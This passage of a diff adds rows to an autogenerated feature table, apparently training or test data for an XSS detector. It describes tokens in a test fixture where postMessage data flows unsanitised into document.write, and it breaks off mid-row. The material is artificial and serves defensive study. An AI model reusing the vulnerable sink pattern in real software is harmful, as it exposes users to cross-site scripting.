fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:16 | document | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:16 | document | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:16 | document | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:16 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:16 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:22 | document.write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:22 | document.write | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:22 | document.write | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:22 | document.write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:22 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:34 | documen ... t.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:34 | documen ... t.data) | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:34 | documen ... t.data) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:34 | documen ... t.data) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:34 | documen ... t.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:34 | exceptional return of documen ... t.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:34 | exceptional return of documen ... t.data) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:34 | exceptional return of documen ... t.data) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:34 | exceptional return of documen ... t.data) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:9:12:34 | exceptional return of documen ... t.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:18:12:22 | write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:18:12:22 | write | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:18:12:22 | write | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:18:12:22 | write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:18:12:22 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:28 | event | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:28 | event | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:28 | event | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:28 | event | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:28 | event | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:33 | event.data | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:33 | event.data | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:33 | event.data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11842,6 +89931,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:33 | event.data | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:33 | event.data | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:12:24:12:33 | event.data | receiverName | document | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:30:12:33 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:30:12:33 | data | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:30:12:33 | data | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:30:12:33 | data | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:12:30:12:33 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:16 | document | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:16 | document | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:16 | document | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:16 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:16 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:22 | document.write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:22 | document.write | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:22 | document.write | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:22 | document.write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:22 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:30 | documen ... y.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:30 | documen ... y.data) | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:30 | documen ... y.data) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:30 | documen ... y.data) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:30 | documen ... y.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:30 | exceptional return of documen ... y.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:30 | exceptional return of documen ... y.data) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:30 | exceptional return of documen ... y.data) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:30 | exceptional return of documen ... y.data) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:9:13:30 | exceptional return of documen ... y.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:18:13:22 | write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:18:13:22 | write | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:18:13:22 | write | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:18:13:22 | write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:18:13:22 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:24 | y | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:24 | y | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:24 | y | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:24 | y | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:24 | y | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:29 | y.data | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:29 | y.data | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:29 | y.data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11850,6 +89974,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:29 | y.data | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:29 | y.data | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:13:24:13:29 | y.data | receiverName | document | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:26:13:29 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:26:13:29 | data | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:26:13:29 | data | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:26:13:29 | data | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:13:26:13:29 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:10 | window | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:10 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:10 | window | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:10 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:10 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:27 | window. ... istener | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:27 | window. ... istener | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:27 | window. ... istener | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:27 | window. ... istener | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:27 | window. ... istener | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:71 | exceptional return of window. ... ems'})) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:71 | exceptional return of window. ... ems'})) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:71 | exceptional return of window. ... ems'})) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:71 | exceptional return of window. ... ems'})) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:71 | exceptional return of window. ... ems'})) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:71 | window. ... ems'})) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:71 | window. ... ems'})) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:71 | window. ... ems'})) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:71 | window. ... ems'})) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:5:16:71 | window. ... ems'})) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:12:16:27 | addEventListener | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:12:16:27 | addEventListener | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:12:16:27 | addEventListener | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:12:16:27 | addEventListener | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:12:16:27 | addEventListener | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:29:16:37 | "message" | CalleeFlexibleAccessPath | window.addEventListener | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:29:16:37 | "message" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:29:16:37 | "message" | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11858,6 +90012,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:16:29:16:37 | "message" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:29:16:37 | "message" | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:29:16:37 | "message" | receiverName | window | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:42 | foo | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:42 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:42 | foo | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:42 | foo | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:42 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:47 | foo.bind | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:47 | foo.bind | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:47 | foo.bind | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:47 | foo.bind | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:47 | foo.bind | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | exceptional return of foo.bin ... tems'}) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | exceptional return of foo.bin ... tems'}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | exceptional return of foo.bin ... tems'}) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | exceptional return of foo.bin ... tems'}) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | exceptional return of foo.bin ... tems'}) | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | foo.bin ... tems'}) | CalleeFlexibleAccessPath | window.addEventListener | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | foo.bin ... tems'}) | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | foo.bin ... tems'}) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11866,6 +90035,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | foo.bin ... tems'}) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | foo.bin ... tems'}) | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:40:16:70 | foo.bin ... tems'}) | receiverName | window | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:44:16:47 | bind | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:44:16:47 | bind | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:44:16:47 | bind | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:44:16:47 | bind | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:44:16:47 | bind | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:49:16:52 | null | CalleeFlexibleAccessPath | foo.bind | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:49:16:52 | null | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:49:16:52 | null | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11882,6 +90056,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:16:55:16:69 | {data: 'items'} | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:55:16:69 | {data: 'items'} | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:55:16:69 | {data: 'items'} | receiverName | foo | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:59 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:59 | data | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:59 | data | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:59 | data | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:59 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:68 | data: 'items' | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:68 | data: 'items' | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:68 | data: 'items' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:68 | data: 'items' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:68 | data: 'items' | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:68 | data: 'items' | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:68 | data: 'items' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:68 | data: 'items' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:68 | data: 'items' | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:16:56:16:68 | data: 'items' | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:62:16:68 | 'items' | CalleeFlexibleAccessPath | foo.bind | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:62:16:68 | 'items' | InputAccessPathFromCallee | 1.data | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:62:16:68 | 'items' | InputArgumentIndex | 1 | @@ -11891,6 +90080,112 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:16:62:16:68 | 'items' | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:62:16:68 | 'items' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/addEventListener.js:16:62:16:68 | 'items' | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:18:10 | window | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:18:10 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:18:10 | window | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:18:10 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:18:10 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:18:20 | window.onmessage | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:18:20 | window.onmessage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:18:20 | window.onmessage | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:18:20 | window.onmessage | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:18:20 | window.onmessage | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:23:5 | window. ... k\\n } | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:23:5 | window. ... k\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:23:5 | window. ... k\\n } | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:23:5 | window. ... k\\n } | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:5:23:5 | window. ... k\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:12:18:20 | onmessage | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:12:18:20 | onmessage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:12:18:20 | onmessage | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:12:18:20 | onmessage | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:12:18:20 | onmessage | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:18:24 | e | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:18:24 | e | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:18:24 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:18:24 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:18:24 | e | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:18:24 | e | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:18:24 | e | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:18:24 | e | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:18:24 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:18:24 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | 'arguments' object of anonymous function | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | 'arguments' object of anonymous function | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | e => {\\n ... k\\n } | assignedToPropName | onmessage | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | e => {\\n ... k\\n } | contextFunctionInterfaces | foo(x, event, 